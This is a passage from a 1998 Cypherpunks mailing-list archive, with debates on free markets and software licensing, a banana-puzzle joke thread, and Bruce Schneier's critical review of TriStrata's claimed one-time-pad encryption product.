> capital investment in transcontinental railway, so the government make
> *exclusive* lands grants to specific railroads to extend the railways to
> the West coast (100M acres between 1863-7) . Those subsidies created the
> monopolies, the source of coercive power over Western farmers. Protest
> against this arbitrary power was blamed on the market instead of the
> government subsidies, and resulted in the Interstate Commerce Act of
> 1887, and the Sherman Act of 1890. 

Only *after* it was clear that these companies could not do it themselves
because of a lack of sufficient traffic to support the business.

I must congratulate you. You're the first person in a long while who actualy
took the time to develop an argument based on *fact*. Well done.

> I should have stated government "distortions" instead of "regulation."
> That includes subsidies.

Even better, a distinction between 'law' and a 'grant'!....

> The placement (ownership) of these rights, their value, restrictions and
> enforcement are the result of a free market? No, government
> intervention.

Actualy no, try buying a piece of land and enforcing the title *without*
registering it at the country seat or its likes.

> Did anyone ever state monopolies result from federal regulations?
> Government distortion/intervention, that can come at any level. Acts of
> force or coercion can create a monopolistic situation, free trade
> cannot.

Absolutely it can because it actualy allows a freer hand in developing
strategies to decrease the market potential of ones competition. There is
*nothing* in free-market definitions or descriptions which will prevent
gross abuse of the consumer by the manufacturer. Remember in a free-market
there is the requirement for 'fair competition' which is contrary to the
very theory of business operation, which is to maximize profit and reduce
competition.

Now if we lived on Vulcan and we were all logical Vulcans it might work,
unfortunately we're not and human beings will specificaly go after their
competition, which without some sort of regulation being impossed leads to
obvious results; initialy a very fluid and dynamic market that settles down
with the survival of the fitest getting bigger and bigger. As these
companies get big enough they can no longer react as  quickly as they once
did (intertia of strategy among other things). At some point it becomes
easier to cooperate than to continue to fight. That cooperation leads to a
melding and promotes even more monopolization. 

> So what is the discriminating factor(s) distinguishing industries that
> can and cannot be monopolized?

Saturation of the consumer market, high start-up costs in either
infrastructure or intellectual resources, and others. I posted a list of
some characteristics to the list a while back. You can look for it. If I get
time I'll post it to the list again.

> Don't forget capital markets;

Are you speaking of capital markets in the sense of fluid and available
funding or of the existance of businesses that produce the capital assetts
needed by other businesses (eg creating rail-cars for rail-roads)?

 a free fluid capital market can and will
> support a smaller competitor if potential long term profits will support
> it.

You can't pay your employees today with tomorrow profit. This isn't a
Popeye's hamburger vendor...

There is another question I'd like to pose. In a free-market economy there
are only two participants, the consumer and the producer, what if anything
in the definition prevents one or the other from employing an agent in their
stead to 'negotiate' with the other. Does this by definition introduce a
third party or is it a permissible extension of the two-party system?


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 5 Oct 1998 07:33:54 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Another question about free-markets... (fwd)
Message-ID: <199810051237.HAA03149@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 04 Oct 1998 22:58:05 -0700
> From: "James A. Donald" <jamesd@echeque.com>
> Subject: Re: Another question about free-markets...

> > If this includes lying, denying consumers information, etc.
> > what harm is done, they have fulfilled their responsibility
> > to their shareholders (potentialy quite lucratively)=20
> 
> While there is a sucker born every minute, the strategy you
> describe is for the most part unlikely to be profitable.

Then you should begin to check your daily news, example after example is
presented. (currently illegal) cell phone cloning, excessive rate levels,
sub-standard construction practices, etc.

People by their very nature understand and impliment the prisoners delima
maximum pay-off strategy.

Not only can it happen it deos. Given that such abuse is possible in a
regulated market there is no reason not to deduce it will happen in a free
market economy as well. If it happens the business enjoys an increased profit
if for no other reason than their costs are reduced. Since there is no
regulation or other oversight the consumer will be denied this information
preventing fair competition. Since a companies strategic leaders have no
duty other than maximizing profit they will impliment such strategies. Hence
the free-market reduces to an opportunistic anarchy.

This leads to one and only one conclusion, in a free-market there is no such
thing as 'fair trade' without a third party being involved. This runs
contrary to the definition of a free market on two counts (at least) and
therefore the free market theory (as applied to human business, not Vulcan)
is a circular argument based on faulty principles and a lack of
understanding of human psychology (ie assumptions such as rational
purchases).


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 5 Oct 1998 10:31:14 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Another question about free-markets... (fwd)
In-Reply-To: <199810051212.HAA02813@einstein.ssz.com>
Message-ID: <199810051530.IAA24397@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



>> From: Steve Mynott <stevem@tightrope.demon.co.uk> there
>> are laws based on natural rights

At 07:12 AM 10/5/98 -0500, Jim Choate wrote:
> Ok, who writes the laws? 

No one.

> Who enforces the laws? Who decides what is natural?

In the minarchist proposal, as explained by Bastiat, already
quoted on this thread, http://www.jim.com/jamesd/bastiat.htm
"the collective force", aka the minimal state.

In the anarchist proposal, explained by Spooner in "Natural
Law" http://www.jim.com/jamesd/spooner.htm, and myself in
"Anarcho Capitalism, a short summary"
http://www.jim.com/jamesd/anarcho-.htm, anyone and everyone
decides.  Attempts to enforce unnatural law are more likely
to get one killed.

Friedman in "A positive account of property rights"
http://www.best.com/~ddfr/Academic/Property/Property.html
explains why enforcing the law "Whats yours is yours, and
what is mine is mine" is less likely to get you killed than
attempting to enforce the law "Whats mine is mine, whats
yours is up for grabs" 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     y5lZXNb9KdI6G/J/Mw0QVE3D0Xa+BCJ1nJ9JZrgy
     4b6jnnkVkioQJ7SSLk7VTW3r694QFvcvfRB6H3dGp
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 5 Oct 1998 01:35:09 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810050630.IAA21291@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> At 12:59 PM 10/3/98 -0400, Michael Motyka wrote:
> >> There is a desert which is 1000 miles across. There is a camel who can
> carry
> >> 1000 bananas maximum. The camel eats 1 banana per mile travelled. The camel
> >> has a total of 3000 bananas to begin with. What is the maximum number of
> >> bananas that the camel can get across to the other side uneaten?
> >
> >My camels don't understand/can't eat fractional bananas.
> 
> Why are bananas quantized in the presense of camels?  Is this
> a quantum-computing thing?
> 
Can the camel increase his miles/banana ratio if he dries out the 
peels and smokes them?? 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 5 Oct 1998 03:46:05 +0800
To: ravage@einstein.ssz.com
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code) (fwd)
In-Reply-To: <199810050201.VAA01105@einstein.ssz.com>
Message-ID: <199810050741.IAA11755@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:
> > If your aim is to maximise crypto deployment, use BSD or some other
> > relatively free distribution license other than GNU, so that we can
> > more rapidly write and deploy crypto software to undermine the power
> > of the state.
> 
> With the proviso that the original author looses all access to profits from
> that code, effectively doing the R&D for untold numbers of companies without
> compensation or even recognition (they can claim it's all theirs at that
> point because they don't have to release the source).

Understanding dawns...

See, perhaps for you, personally, profit maximisation for yourself is
more interesting than crypto deployment.  But as I said in the section
quoted above "If your aim is to maximise crypto deployment", use BSD.

ie. Cypherpunks may choose to sacrifice profit, or recognition for in
the interests of deployment.

Tho' actually even these assumptions you are making are not always
correct: for example Eric Young does not charge for his software, Eric
gets lots of recognition (partly because his license asks for this --
"this software includes work by Eric Young" requirement); Eric I dare
say has as much consultancy work offered to him to work on developing
free code as he has hours for.

I ended up doing some paid crypto development work on SSLeay (the
resulting additions were also BSD licensed), and the person asking me
to do this commented that they had asked Eric, but he had too much
work.

So your theory doesn't work in this case: Eric is getting to make
money, get recognition, and maximise deployment.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hahn <mhahn@tcbtech.com>
Date: Mon, 5 Oct 1998 08:10:07 +0800
To: Anonymous <cypherpunks@toad.com
Subject: Re:
In-Reply-To: <199810050630.IAA21291@replay.com>
Message-ID: <3.0.1.32.19981005085903.009519b0@mail.aosi.com>
MIME-Version: 1.0
Content-Type: text/plain



The base problem is interesting and I think ted would like it. I don't
think smoking bananas will make is any easier to solve the problem.

-MpH

At 08:30 AM 10/5/98 +0200, Anonymous wrote:
>> At 12:59 PM 10/3/98 -0400, Michael Motyka wrote:
>> >> There is a desert which is 1000 miles across. There is a camel who
can carry
>> >> 1000 bananas maximum. The camel eats 1 banana per mile travelled. The
camel
>> >> has a total of 3000 bananas to begin with. What is the maximum number of
>> >> bananas that the camel can get across to the other side uneaten?
>> >
>> >My camels don't understand/can't eat fractional bananas.
>> 
>> Why are bananas quantized in the presense of camels?  Is this
>> a quantum-computing thing?
>> 
>Can the camel increase his miles/banana ratio if he dries out the 
>peels and smokes them?? 
>
>
--------
Mark P. Hahn                    Work: 212-278-5861
mhahn@tcbtech.com               Home: 609-275-1834
TCB Technologies, Inc (mhahn@tcbtech.com)

Consultant to:
The SoGen Funds	1221 Avenue of the Americas, NY NY




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 6 Oct 1998 02:36:45 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810042013.PAA32334@einstein.ssz.com>
Message-ID: <3.0.5.32.19981005091349.008ad100@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:13 PM 10/4/98 -0500, Jim Choate wrote:
>> From: "James A. Donald" <jamesd@echeque.com>
>> At 09:08 AM 10/4/98 -0500, Jim Choate wrote:
>> > Your local church is a member of a larger international
>> > collective that does in fact use coercion in one form or
>> > another.
>> Send me some of whatever you are smoking.
>
>That's the best you can come up with?

He's just implying that *your* local church is Rastafarian....


~~~~~
Kingdom?  I thought we were an autonomous collective....

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Mon, 5 Oct 1998 09:40:04 +0800
To: cypherpunks@toad.com
Subject: Review of TriStrata Public Information
Message-ID: <199810051426.JAA18393@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



Review of TriStrata Public Information


1  Introduction

Over the past several months, a new company called TriStrata has been
getting substantial press for a new "one-time pad" cryptography system.
Most of these press reports took at face value the company's claims about
their technology and product, and did not try to analyze whether or not
they were true.  Counterpane Systems believes  it is important to dig under
the hype and figure out what the real story is behind their technology.

We reviewed the publicly available documentation on TriStrata, and found a
system whose architecture is that of an early-1970s pre-public-key
cryptography security system.  Central servers, upon which the security of
every message rests, must be kept absolutely secure; yet they run on
Windows NT.  These servers are all powerful, in that they can forge
messages, rewrite audit logs, fake authentication, and lie about anything
else in the system.  Users cannot access their files unless they are
connected to this server.  TriStrata does not use a one-time pad at all,
and none of the security proofs about a one-time pad apply to their system.
Their reliance on this encryption technology forces them to use security
protocols long abandoned by the rest of the security industry.  Even their
performance enhancements bely the fact that encryption is rarely the
bottleneck in any communications system.

Note: For a less-technical summary of this review, please see sections 4.0,
4.1, and 5.0.


2.0  The TriStrata System

2.1  Structure

The TriStrata system uses a centralized server, called the TESS (TriStrata
Enterprise Security Server).  The documentation is not very clear, but
document reference 3 suggests that each company would have its own TESS.
Every encryption or decryption operation requires a "permit" from the TESS.

To encrypt a file or message:

1. The user contacts the TESS over the network.  This can be any type of
network, such as the Internet or a local area network.

2. The user and the TESS authenticate each other using a proprietary
protocol called Private Access Line (PAL). 

3. The TESS sends a permit to the user machine, which is used to encrypt
the file or message. The TESS also sends a "seal" to the user.  This seal
is only readable by the TESS. 

4. The user simply stores the seal with the file (if it is encrypted
locally), or sends the seal along with the encrypted message (if it is to
be transmitted to another user).

To decrypt a file or message:

1. The user retrieves the seal and sends the seal to the TESS (along with
the authentication data from the PAL protocol).

2. The TESS opens the seal, and determines whether the user is allowed to
decrypt the data.

3. If the user is allowed to decrypt the data, the TESS sends a
decryption permit to the user. 

4. The user's local machine uses this permit to decrypt the file or message.

The TESS keeps full audit logs of all operations, and includes procedures
that allow designated recovery agents within the company to recover the
keys to any file.

The system is claimed to provide identification (who is using the system),
authentication (who sent a message), access control (restriction of access
to authorized users), integrity (assurance message is unaltered), and
non-repudiation (sender cannot deny having sent it).  They have received an
export license for their system.

2.2 Authentication

The authentication method used to authenticate the user to the TESS and
vice versa is a crucial part of the security architecture.  The TriStrata
documentation contains no further information than that this is handled by
the Private Access Line protocol.

2.3  Encryption Algorithm

The Random KeyStream (RKS) encryption algorithm used by TriStrata is hailed
as "a new fundamental technology."  It is claimed to be very fast, but the
documentation only contains raw speeds, without documenting which platform
these speeds were achieved on.  The encryption technology is also claimed
to be unconditionally secure. To quote the web site: "No matter how much
mathematical analysis or computing power is applied to the cryptanalysis of
RKS, there is simply no algorithm and no underlying pattern to break.  As
Herbert Yardley foresaw in 1931, cryptography as a profession is dead."


3.0  Our Comments

3.1  The Central Server Structure

Cryptographic systems that use a central access control server are nothing
new. The Kerberos protocol uses a central server for similar tasks.  Using
such a central server as the TESS has several advantages and disadvantages.

The main advantages are:

- There is a central place that administrates all the access rights.  This
makes various administrative tasks easier.

- Revocation of access is automatically supported by the system.  No
separate revocation mechanism is necessary.

- The central server can keep comprehensive auditing logs of
security-related operations.


The main disadvantages are:


- The central server contains confidential information, namely the master
keys that can decrypt any file. It is thus a very tempting target for
attack.  The central server must be very well protected.  At the same time,
the server must be reachable from across the network, and must be reliable,
as nothing can work without a functioning server.  The end result is a
server that is expensive (due to all the requirements) and that still is an
obvious point of attack.

- The central server is a single point of failure. TriStrata uses a
redundant server structure with fail-over, so that a second server takes
over when the first fails.  A fail-over structure protects against
technical errors, but does not necessarily protect against
denial-of-service attacks.  The TESS is based on a "security hardened"
version of Windows NT, an operating system that is not known for its
resistance to malicious attacks.

- The system is effectively a closed system.  Only users who are registered
at the server can partake in the system.  It is not clear how two users
that belong to different servers would communicate.  The TriStrata
documentation mentions electronic commerce extensively, but it does not
discuss how two users at two different companies can use the TriStrata
system to communicate with each other.

- Since the server contains crucial confidential information, every company
must run its own server.  A failure of the server, such as a leak of the
master keys from the server, can reveal all of the company's information.
This is the kind of task that should not be outsourced.  In contrast, the
key server of a public-key-based system is much easier to outsource as it
can be designed so as not to be critical for security.

- The TriStrata solution does not allow a user that is off-line to access
any encrypted files.  A salesman that keeps his data encrypted on his
portable computer cannot access the data without contacting the TESS.  If
he cannot get network access for some reason (e.g., on an airplane,
mismatched phone plug, etc.), he cannot access his own files.

The TriStrata solution is a return to a very old style of centralized key
management.  For some applications this is a good solution, but there are
many situations in which a centralized server is not appropriate.  For
example, one function that a central server cannot do well is
non-repudiation between adversarial parties (one of the critical functions
in electronic commerce).  The TESS system seems to provide non-repudiation
through inspection of the logs of the TESS.  But if a message is sent
between two companies, which TESS do they use? The company that owns the
TESS that is used can manipulate the logs in their own favor.  The end
result is that there is no watertight proof that the message was sent or
received.

In effect, this solution takes us back to the days before public-key
cryptography.  Since its invention in the late 1970s, the ideas of
certificates, public key infrastructure, decentralized key management,
separation of encryption and digital signature functions, etc., have all
been implemented in response to insecurities in centralized systems.  For
example, public-key infrastructures use trusted third parties like the
TESS, but in a public-key system, compromise of the trusted third party
only allows an attacker to issue false certificates, not to decrypt and
read messages.

3.2  Authentication

We have no further information on the PAL protocol.  The documentation does
state that the communication with the TESS consists of a single message
from the user to the TESS, and a single reply back.  Elsewhere it says that
the TESS is stateless, which makes it easy to do a fail-over should one
TESS fail.

It is not clear to the reviewers how the PAL protocol works, if we assume
it consists of two messages and is stateless for the TESS.  These two
properties together would suggest that an attacker can replay requests to
the TESS.  If nothing else, this introduces fake entries in the audit log.
Some of these attacks can be hindered by the use of local clocks, but every
solution along these lines we have ever seen is always troubled by clock
synchronization problems.

We note that the PAL protocol is critical for the security of the overall
system.  If an attacker can impersonate another user, then he can request
the proper permit from the TESS to decrypt a file, and will get access
regardless of the security of the actual encryption algorithm.  The PAL
protocol deserves careful scrutiny before the TriStrata system is put to use.

The most straightforward attack against the TriStrata system is to
introduce some hostile code into the client's PC (for example, a virus or
Trojan horse). This hostile code can then steal the necessary
authentication information and send it back to the attacker.  This type of
attack is a generic attack against any security system, not just the
TriStrata system, but it shows that the "provable security" is at best
limited to a small part of the system and does not extend to the whole system.

3.3  Encryption

To put it bluntly: the TriStrata system does not use the one-time pad
system (Vernam cipher) for encryption.  A true one-time pad uses a random
key that is distributed through a separate secure channel.  While a
one-time pad is, in fact, theoretically unbreakable when used properly, the
details of using it properly make it entirely unusable in any modern
commercial or military setting.

A true one-time pad gains its unbreakable security from the fact that the
key is as long as the message.  Since all keys are equally likely, and a
particular ciphertext could represent any message, given a particular key,
the ciphertext reveals nothing about the plaintext message without the
correct key.  These random keys must be entirely random; this usually
requires generating them from some external random source (such as thermal
noise or radioactive decay).  And both the sender and the receiver must
have this secret key, which must be exchanged in some fashion which the
attacker cannot penetrate.

The requirement that the keys be as long as the data to be exchanged and
that the key needs to be transported via some secure mechanism makes the
one-time pad system entirely impractical.  In order to send a 1 MB message,
the sender and receiver must exchange a 1 MB-long key.  Then the sender
could send the message and the receiver could use the key to decrypt it.
The key would then have to be thrown away and never used again.  If the
sender wanted to exchange messages with a hundred people, he would have to
pre-agree on different keys between each recipient.  For a company with a
thousand employees, this means that there are 499,500 different key sets,
which need to be replenished any time they are exhausted by message exchange.

Because the key has to be as long as the message, there is no way to use an
established system to exchange more keys, since in order to securely send
as 1 MB key a user needs 1 MB of additional pre-agreed key.  (And if users
can exchange these keys, why can't they just exchange the messages?)  This
means that all keys have to be exchanged via some other mechanism (such as
a courier).  This kind of system was used for the U.S.-Soviet teletype "hot
line" and it is occasionally used for paper ciphers and spies, but that's it.

There is no way in which a true one-time pad can be implemented over a
computer network.  From the information provided by TriStrata, we believe
that the encryption method used is a keystream method where an algorithm
generates a key stream which is then XORed with the plaintext to generate
the ciphertext.  This is known as a pseudo one-time pad, and is also called
an OFB stream cipher.  One of the modes of DES works in this manner, as
does the RC4 encryption algorithm.  This is not new technology. 

A pseudo one-time pad encryption algorithm can be secure, but claiming that
it is secure because it is based on the one-time pad is ridiculous.  The
strength of the cipher algorithm depends on the method used to generate the
key stream. 

The speed given for the encryption method is fairly fast, but without
knowing what platform was used to achieve these speeds, no sensible
comparison can be made.  To give some comparison material: the leading
candidates for the AES block cipher encryption standard can encrypt data in
about 18 clock-cycles per byte on a Pentium II.  A standard 350 MHz desktop
machine thus achieves nearly 20 Mbytes per second.  This compares to the
TriStrata claimed speed of 36 Mbytes per second for a standard desktop
machine.  The TriStrata figures are faster, but only by a factor of two.
This would be a nice speedup, but it does not present a fundamental
breakthrough in speed.

Reference 4 is a magazine article report that contains more information
about the encryption algorithm.  As with any magazine article, the accuracy
of the information is hard to judge.  Nevertheless, the information it
provides fits well with the information we have from TriStrata.

The TESS generates a single 1 Mbyte block of random data using a hardware
random number generator.  This block is distributed to all clients.  (A
second block is used for authentication, but we have no further information
on the algorithm.)  The encryption algorithm keeps several pointers into
this random block and derives the random key stream from the data the
pointers point to. This is a known technique, first used by Maurer in his
randomized cipher [Reference 5].  The TriStrata documentation talks about a
virtual keystream of over 10^30 bytes, which would correspond to 5 pointers
into a 1 Mbyte block.  This suggests an effective key size of at most 100
bits.  On the other hand, the website also claims that it would take 3.5 x
10^33 years to defeat one TriStrata-encrypted message, which would suggest
either a larger key space or a fundamental misunderstanding of the
mathematical properties of Maurer's system.

The random block is the same for all the clients.  It has to be, as the
client that does the decryption needs the same random block as the client
that does the encryption (and sending 1 Mbyte blocks around in the permit
is too slow).  Therefore, we cannot view this random block as a secret.
After all, a secret shared amongst thousands of users is not a secret any
more.  If we want a more conventional representation of the encryption
algorithm, we can represent the random block as a randomly generated 20 by
8-bit S-box. 

We have no knowledge about the details of this encryption algorithm, but
the most straightforward variants of this type are susceptible to a
meet-in-the-middle attack on the pointer space.  This could reduce the
effective key size to as little as 60 bits.

The journalist did a speed test of TriStrata's file encryption utility.  On
a 200 MHz Pentium Pro, 128 MB RAM and PCI Ultra-SCSI disk subsystem it
encrypted a 58 MB file in 18 seconds.  This corresponds to a speed of 3.2
Mbytes per second. Presumably this speed is limited by the speed of the
disk I/O.  On this platform a traditional encryption algorithm such as
Blowfish can encrypt at 10 Mbytes per second; the super-fast RKS encryption
is presumably faster than this.  Although this test does not give us any
real speed data, it does show that encryption speed is not the bottleneck
in most situations.  In this situation, the disk I/O is much slower than
the cryptography, making the encryption speed irrelevant.

3.5  Proprietary Encryption Algorithms

The nature of cryptography is such that there is no way to prove that a
cipher is secure, since this amounts to proving a negative assertion: that
there is no way to break it easily.  Anyone, from the most unsophisticated
amateur to the best cryptographer, can create an algorithm that he himself
can't break.  What is hard is creating an algorithm that no one else can
break, even after years of analysis.  And the only way to prove that is to
subject an algorithm to years of analysis by the best cryptographers around.

Because of this situation, the only recognized criterion for secure
cryptographic systems is peer review: having other cryptographers examine a
cipher and attack it. Even cryptographic organizations which operate in
secret, such as the NSA, have an extensive internal peer review system.

>From past experience we know that systems that are kept secret and 
presented as "provably secure," "unbreakable," "a 
new fundamental technology," or "one-time pad" are usually 
not very good at all.  Those who say these things generally do not 
understand the current state-of-the-art of mathematical cryptography, and 
make fundamental mistakes in their system design.

Encryption algorithms that are unpublished have a dismal record. The
literature is littered with the corpses of encryption algorithms that were
broken once they were published. Until TriStrata publishes its algorithm
and it is open to peer review there is no professional reason to presume it
is secure.


4.0  The Real Problem in Security Systems

It is interesting to note that TriStrata gives a lot of attention to the
encryption algorithm.  From all the problems that security systems face at
the moment, the encryption algorithm is probably the least important one.
There are many good encryption algorithms available in the published
literature that can be used for free.  TriStrata chose to develop their own
algorithm.  Although this can be a lot of fun, it is a decision that is
hard to justify, as new algorithms can only be considered secure after an
ample time of peer review.

Cryptographic systems are broken constantly, but the attacks are almost
never against the algorithms.  The really difficult problems in security
systems are key distribution, management, reliability, robustness, etc.
TriStrata uses the solution of having a central server, as necessitated by
its choice of encryption technology.  This solution is suitable in some
situations, but there are many problems that cannot be handled by this
approach.  In fact, the problems associated with central servers and
centralized key distribution have been driving the development of
public-key--based systems for the last two decades.

TriStrata, by implementing a Maurer-style randomized stream cipher and the
centralized key management it requires, has taken the one piece of the
cryptographic puzzle that we can solve--symmetric encryption--and made what
they perceive to be security improvements.  However, they did this at the
expense of the really hard problems in cryptography...ones that their
system does not seem to adequately solve.

4.1  Trust and Security Systems

Whenever someone buys a commercial product, he is trusting that the
manufacturer did a good job designing and building the product.  This is
especially important with security products.  If someone buys a word
processor and it does not perform as advertised (e.g., the print function
does not work), he will eventually notice (he won't be able to print his
documents).  If someone buys an encryption product, it can function
normally (encrypting and decrypting documents successfully), but that is no
indication that it is secure.  Security is completely separate from
functionality, and no amount of beta testing can ever uncover a security flaw.

In the commercial world, we rely on the public review process to evalute
the security of systems.  Internet security infrastructures, such as IPSec,
PKIX, and SSL, have been discussed and debated for years.  Versions have
been proposed, security flaws have been found, fixes have been implemented,
and so on.  Cryptographic algorithms in these protocols are ones that have
been around for years, and have had extensive cryptographic review by the
best in the field.  Even this is no guarantee of security--implementation
flaws are found (and fixed) in the code that implements these protocols,
but it establishes a certain degree of confidence.

TriStrata has chosen to ignore all public standards in favor of their own
proprietary technology, while at the same time refusing to make technical
details of their technology public.  In order to use their system, the
purchaser must trust that their cryptographers are better than the
collective wisdom of the world's academic cryptographers, that their
protocol designers are better than everyone who has worked on the open
Internet protocols over the last few years, that their implementers are
better than everyone who has made and evaluated the public implementations
of those protocols.  The purchaser must trust that TriStrata's misuse of
the academic terminology does not reflect a misunderstanding of that
technology, and that their technology is so much better than what everyone
else has agreed upon that it makes sense to make that leap of faith.

In the end, a star-studded board of directors and upper management does not
obviate the need for good science, open systems, and peer review.  It's
simply foolish to trust a system that has not been evaluated.


5.0  Conclusions

A system like TriStrata's can be made to work within its limitations.  It
is certainly not the universal solution to the world's security problems.
However, there is a huge amount of hype and very little substance to the
documentation.  Many of the statements made are incomplete, vague, or
suggest facts which cannot be true.  The cryptographic claims are wild and
unsubstantiated.  Parts are clearly written by someone who does not
understand modern cryptography, and who is not well versed in the
cryptographic literature.  Certain areas of the documentation give the
impression that they were written with the intent to deceive the reader,
but ignorance is probably a better explanation.  Based on past experience
with systems that made similar unsupported security claims, we are very
skeptical about the security of the TriStrata system.   

We reviewed the system as we have reconstructed it from various hints in
the text, as well as conversations with people who have been involved with
the system.  Until TriStrata releases technical information about its
product, it is not possible to give a complete evaluation of their technology.


References: 

[1]  TriStrata web site, http://www.tristrata.com, on Sept. 22nd, 1998.

[2]  Walter Hamscher, Alastair MacWillson, and Paul Turner, "Electronic
Business Without Fear: The TriStrata Security Architecture," Price Waterhouse.

[3]  "Building a Secure Future with CTR Business Systems and TriStrata
Security," leaflet.

[4]  Dan Backman, "TriStrata: A Giant Step In Enterprise Security,"
Network Computing Magazine, 15 September 1998.  Online,
http://www.nwc.com/915/915sp1.html

[5]  Ueli M. Maurer, "A Provably-Secure Strongly-Randomized Cipher,"
Advances in Cryptology -- Eurocrypt '90 Proceedings, Springer-Verlag, 1990,
pp. 361--373. 

**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Mon, 5 Oct 1998 04:39:13 +0800
To: mgering@ecosystems.net>
Subject: Re: GPL & commercial software, the critical distinction (fwd)
Message-ID: <19981005094001.10355.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain





Matthew James Gering wrote:
> 
> Jim Choate wrote:
> > I'd say the obvious one, the Unix code tree is more stable
> > than the MS tree.
> 
> Sure, but does that mean the MS platform was less suitable than Unix, or
> their MS platform programmers were inferior to their Unix counterparts.
> I believe Netscape outsourced the Unix development, at least initially.
> I would blame insufficient SQA at Netscape, and from what I've heard
> that claim is justified.
> 
>         Matt

My impression is that the instability described is due to fragmentation of the
virtual memory space, which happens faster on NT than Unix because of 
the relative immaturity of NT memory management. The side comment about
Mac's being even worse would support this hypothesis (as Mac memory management
is a joke).

The Netscape SQA theory doesn't explain why other products also become 
less reliable on NT (and worse again on 95).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Mon, 5 Oct 1998 09:41:28 +0800
To: "Brown, R Ken" <jamesd@echeque.com>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8480@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



> James A. Donald wrote
> 
> [oddly irrelevant stuff about Satan skipped]
> 
> > A big company has no monetary advantage over a small company.
> 
> > Suppose Firm A controls 90% of the market and firm B 
> > controls 10% of the market.  Artificially low prices cost the 
> > big firm nine times as much as the small firm.  Under 
> > capitalism, the small company can duke it out on equal
> > terms with the big firm, and with great regularity, 
> > that is exactly what they do.
> 
> Sometimes. And sometimes they don't. Sometimes half-a-dozen big boys just
> gang up on the smallest. 
> 
> Anyway, your example ignores cross-subsidy whcih is the usal way to do
> this. 
> 
> And bigger companies precisely *do* have a financial advantage over small
> - they can borrow money at lower rates and they have more ways of hedging.
> When they  operate in more than one part of the world a certain amount of
> hedging is built in.  In general economies of scale aren't, but finance is
> one area where they do work.
> 
> There are more forms of competition than a price war Also if it comes to a
> *legal* slugging match the total amount
> 
> 
> >> Garbage (what we call rubbish over here) collection  is
> >> different again. It's not at all a nutural monopoly and
> >> there is nothing stopping anyone offering to do it as a
> >> business. But it is a natural for social ownership,
> 
> > You mistake the political adventures of your local elite for
> > universal laws.  
> 
> Just like you Americans do when you drivel on about guns in ways that most
> other people either don't care about or find repulsive?
> Anyway, I wasn't talking abou the  elite but  the majority. 
> 
> > In some parts of the world rubbish collection is private.
> 
> Yes, I know that. In some parts of this coutnry also. Anywere genuinly
> rural for a start. What's that got to do with what I said? 
> 
> > There is no "natural monopoly" that is not somewhere 
> > a private industry, and often it is a private industry in a
> > place that is otherwise quite socialist.  Public and private
> > ownership reflect the accidents of politics and history more
> > than they reflect the natural characteristics of the industry
> > in dispute.
> 
> I agree with this completely, but I don't think it invalidates anything we
> said. You are confusing 3 quite different questions:
> 
> - social ownership versus private ownership
> - competition versus monopoly
> - free trade versus protection
> 
> Ken Brown
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Mon, 5 Oct 1998 08:50:54 +0800
To: cypherpunks@EINSTEIN.ssz.com
